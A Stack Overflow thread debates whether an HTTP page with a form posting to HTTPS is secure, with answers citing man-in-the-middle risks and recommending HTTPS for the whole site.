26

I have a HTTP page with a form. If I set the action to a HTTPS page, is the request secure? Does the browser process all the data before it sends it to the net? Or should I use HTTPS for my entire site?

Seybsen
  • 14,989
  • 4
  • 40
  • 73
Castro Roy
  • 7,623
  • 13
  • 63
  • 97
  • possible duplicate of [Is it secure to submit from a HTTP form to HTTPS?](http://stackoverflow.com/questions/274274/is-it-secure-to-submit-from-a-http-form-to-https) – RobEarl Sep 26 '13 at 10:43
  • Your accepted answer is generally regarded as outdated advice. Please see my response: http://stackoverflow.com/a/22625230/2179408 – Rob Bell Jul 29 '14 at 08:54

6 Answers6

24

Yes, it'll be secure if the location your form is posting to is HTTPS.

Users, however, may freak out that there's no lock icon in their browser on the page with the form. You may be better off from a usability standpoint having both pages be HTTPS.

ceejayoz
  • 176,543
  • 40
  • 303
  • 368
  • 1
    So... is this answer wrong? The accepted answer here, and accepted + highest-voted answers [here](https://stackoverflow.com/a/274280/1175496) all suggest that the form could be subject to MITM attack? – Nate Anderson Jun 01 '17 at 19:24
  • 2
    @TheRedPea My answer is the technical one - a HTTP to HTTPS POST is indeed secure. The accepted answer is right (and accepted as such) for more practical reasons, that being that even if the HTTP to HTTPS is secure, the form on the HTTP site could be trivially MITMed to post somewhere *insecure*. – ceejayoz Jun 01 '17 at 19:26
12

No. Troy Hunt identifies a simple man-in-the-middle attack that shows that posting from HTTP to HTTPS is by no means secure. With the proliferation of free WiFi this attack would be very simple to execute.

http://www.troyhunt.com/2013/05/your-login-form-posts-to-https-but-you.html

Rob Bell
  • 3,542
  • 5
  • 28
  • 49
  • posting in full HTTPS sites neither, i think. – Castro Roy Mar 27 '14 at 14:33
  • Sorry, @Kstro21, not sure what you mean. Do you mean that this exploit could still occur from HTTPS to HTTPS? The first page is encrypted between the server and the client, with no opportunity for the attacker to inject the script. – Rob Bell Mar 29 '14 at 08:33
  • So, posting from HTTPS to HTTPS will never be affected by a man-in-the-middle attack, no matter the used exploit. This is what you meant? – Castro Roy Mar 31 '14 at 16:19
  • 2
    There are still means of performing MITM attacks when posting HTTPS to HTTPS - e.g. if someone was able to adjust your list of trusted certificate authorities, or if a CA were compromised - but posting HTTPS to HTTPS dramatically lessens the opportunity for attack. The exploit that Troy Hunt identifies is a very real threat. The MITM attacks via compromised CAs far less so. – Rob Bell Apr 02 '14 at 12:27
7

Yes. As long as the request that needs to be secure is https, you're good.

That being said, many key sites, including gmail, have stopped bothering carving off small sections of their site to be https and just made their whole site https. It's easier and safer, and you lose little in the way of performance.

Scott Stafford
  • 43,764
  • 28
  • 129
  • 177
  • And boy, is it ever easier. Done properly, session IDs and such should really be regenerated every time a user switches between an HTTP/HTTPS connection. (This is to help minimize the risk of session-hijacking. Once a session ID has been passed in cleartext, it should be considered compromised, from a security perspective.) Having worked on two or three applications which were regenerating these IDs constantly, I can tell you from experience that it's a huge pain in the ass. Just locking into HTTPS only and committing to it is the only way to go, in my opinion. – Chris Allen Lane Apr 01 '12 at 00:23
4

Dont do it!

Consider a MITM attack where an attacker sitting on the wire somewhere between the server and client modifies the login form before it reaches the client. The login form now includes a keylogger or points the POST action to a phishing page instead of the authentic server. There is no warning or UI cue for the end-user, so they go ahead and submit the form.

Consider a MITM attack that involves the attacker deploying a "free Wifi" at a coffee shop (via a smartphone hotspot or whatever). When unsuspecting people use this "free Wifi" to login with an HTTP form, even though it does a POST to HTTPS, the attacker can see the user's plaintext credentials by analyzing their hotspot network traffic.

References:

Community
  • 1
  • 1
perry
  • 266
  • 1
  • 6
3

The actual data transfer from your form to the server is encrypted when posting over HTTPS. If that is what you mean by secure, then yes, it is secure.

I think what you are getting at in your question is, what about client-side stuff reading the form prior to post. That is certainly possible, HTTPS or not.

On another note though, you should probably use HTTPS for the actual form. Some browsers warn users as their posts are redirected over the HTTP/HTTPS boundary. Plus, I don't think your users will be happy filling out a form where there is no secure icon showing.

Brad
  • 159,648
  • 54
  • 349
  • 530
2

If you set action to HTTPS this will indeed be secure. Before anything can happen over HTTPS a handshake has to occur, and the browser sending the data will have to do this when the action occurs.

m.edmondson
  • 30,382
  • 27
  • 123
  • 206